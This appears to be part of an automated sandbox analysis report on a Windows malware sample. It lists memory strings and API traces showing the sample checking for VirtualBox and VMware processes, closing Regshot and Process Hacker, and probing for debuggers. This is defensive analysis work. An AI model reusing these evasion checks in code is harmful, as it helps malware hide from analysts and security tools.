                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: tguujh.msc.exe, 00000010.00000002.1735445912.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE8;0\
                Source: tguujh.msc, 0000000A.00000003.1595065546.000000000133E000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001337000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593328458.000000000133D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: tguujh.msc.exe, 00000010.00000002.1735445912.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESY<Q_
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp, nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: tguujh.msc.exe, 00000010.00000002.1735445912.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEE:U]
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp, nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732163287.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731961848.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733661538.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1734246366.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731724804.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000002.1735063926.00000000016C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")KDW]
                Source: tguujh.msc, 0000000A.00000003.1592648815.0000000001337000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1595025401.0000000001339000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595990222.0000000001335000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592955710.000000000132F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592989297.0000000001334000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731814369.00000000016B1000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732105596.00000000016B1000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732163287.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731961848.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733661538.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731724804.00000000016B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")_L
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp, nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00ED096E rdtsc 15_2_00ED096E
                Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	API coverage: 5.1 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.6 %
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	API coverage: 5.1 %
                Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Code function: 0_2_0099F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0099F826
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Code function: 0_2_009B1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_009B1630
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Code function: 0_2_009C1FF8 FindFirstFileExA,0_2_009C1FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CBE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00CBE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CBD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CBDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CC9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CC9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CCA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CCA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CCA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00CCA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CC65F1 FindFirstFileW,FindNextFileW,FindClose,10_2_00CC65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00C8C642 FindFirstFileExW,10_2_00C8C642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CC72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00CC72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CC7248 FindFirstFileW,FindClose,10_2_00CC7248
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C2E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C2E387
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C2D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2D836
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C2DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2DB69
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C39F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C39F9F
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C3A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C3A0FA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C3A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C3A488
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C365F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00C365F1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00BFC642 FindFirstFileExW,16_2_00BFC642
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C372E9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C37248 FindFirstFileW,FindClose,16_2_00C37248
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Code function: 0_2_009B4E14 VirtualQuery,GetSystemInfo,0_2_009B4E14
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File opened: C:\Users\user~1\AppData\Local\Temp\RarSFX0\
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File opened: C:\Users\user~1\
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File opened: C:\Users\user~1\AppData\Local\Temp\
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File opened: C:\Users\user~1\AppData\Local\
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File opened: C:\Users\user\AppData\Local\Temp\RarSFX0\
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File opened: C:\Users\user~1\AppData\
                Source: tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
                Source: tguujh.msc, 0000000A.00000003.1594782998.000000000137B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execrosoh
                Source: tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1727914247.00000000016A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: tguujh.msc, 0000000A.00000002.1595954813.000000000132D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenUT
                Source: tguujh.msc.exe, 00000010.00000003.1731961848.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7
                Source: nhhjmppg.dll.10.drBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1731961848.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
                Source: nhhjmppg.dll.10.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593096189.000000000136B000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593197392.0000000001372000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1594654841.0000000001383000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593986669.0000000001373000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732066040.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731814369.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732125606.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733232602.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1732282969.00000000016F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                Source: tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenUT
                Source: tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenw
                Source: tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: nhhjmppg.dll.10.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: tguujh.msc.exe, 00000010.00000003.1731961848.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
                Source: tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592312541.0000000001328000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640682055.0000000001694000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733742539.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733956548.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1640864516.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733452273.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1733417726.000000000169C000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000002.1734949458.00000000016A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: tguujh.msc, 0000000A.00000003.1466249872.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenSFX
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeAPI call chain: ExitProcess graph end nodegraph_0-28789
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED096E rdtsc 15_2_00ED096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00417D83 LdrLoadDll,15_2_00417D83
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCF3FF BlockInput,10_2_00CCF3FF
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B6878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C55D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00C55D78
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009BECAA mov eax, dword ptr fs:[00000030h]0_2_009BECAA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C75078 mov eax, dword ptr fs:[00000030h]10_2_00C75078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E980E9 mov eax, dword ptr fs:[00000030h] 15_2_00E980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8A0E3 mov ecx, dword ptr fs:[00000030h] 15_2_00E8A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F160E0 mov eax, dword ptr fs:[00000030h] 15_2_00F160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8C0F0 mov eax, dword ptr fs:[00000030h] 15_2_00E8C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ED20F0 mov ecx, dword ptr fs:[00000030h] 15_2_00ED20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F120DE mov eax, dword ptr fs:[00000030h] 15_2_00F120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F560B8 mov eax, dword ptr fs:[00000030h] 15_2_00F560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F560B8 mov ecx, dword ptr fs:[00000030h] 15_2_00F560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F280A8 mov eax, dword ptr fs:[00000030h] 15_2_00F280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E9208A mov eax, dword ptr fs:[00000030h] 15_2_00E9208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EBC073 mov eax, dword ptr fs:[00000030h] 15_2_00EBC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F16050 mov eax, dword ptr fs:[00000030h] 15_2_00F16050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E92050 mov eax, dword ptr fs:[00000030h] 15_2_00E92050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F26030 mov eax, dword ptr fs:[00000030h] 15_2_00F26030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8A020 mov eax, dword ptr fs:[00000030h] 15_2_00E8A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8C020 mov eax, dword ptr fs:[00000030h] 15_2_00E8C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F14000 mov ecx, dword ptr fs:[00000030h] 15_2_00F14000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F32000 mov eax, dword ptr fs:[00000030h] 15_2_00F32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h] 15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h] 15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h] 15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EAE016 mov eax, dword ptr fs:[00000030h] 15_2_00EAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F661E5 mov eax, dword ptr fs:[00000030h] 15_2_00F661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC01F8 mov eax, dword ptr fs:[00000030h] 15_2_00EC01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h] 15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h] 15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0E1D0 mov ecx, dword ptr fs:[00000030h] 15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h] 15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0E1D0 mov eax, dword ptr fs:[00000030h] 15_2_00F0E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F561C3 mov eax, dword ptr fs:[00000030h] 15_2_00F561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F561C3 mov eax, dword ptr fs:[00000030h] 15_2_00F561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00ED0185 mov eax, dword ptr fs:[00000030h] 15_2_00ED0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h] 15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h] 15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h] 15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F1019F mov eax, dword ptr fs:[00000030h] 15_2_00F1019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F34180 mov eax, dword ptr fs:[00000030h] 15_2_00F34180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F34180 mov eax, dword ptr fs:[00000030h] 15_2_00F34180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F4C188 mov eax, dword ptr fs:[00000030h] 15_2_00F4C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F4C188 mov eax, dword ptr fs:[00000030h] 15_2_00F4C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8A197 mov eax, dword ptr fs:[00000030h] 15_2_00E8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8A197 mov eax, dword ptr fs:[00000030h] 15_2_00E8A197
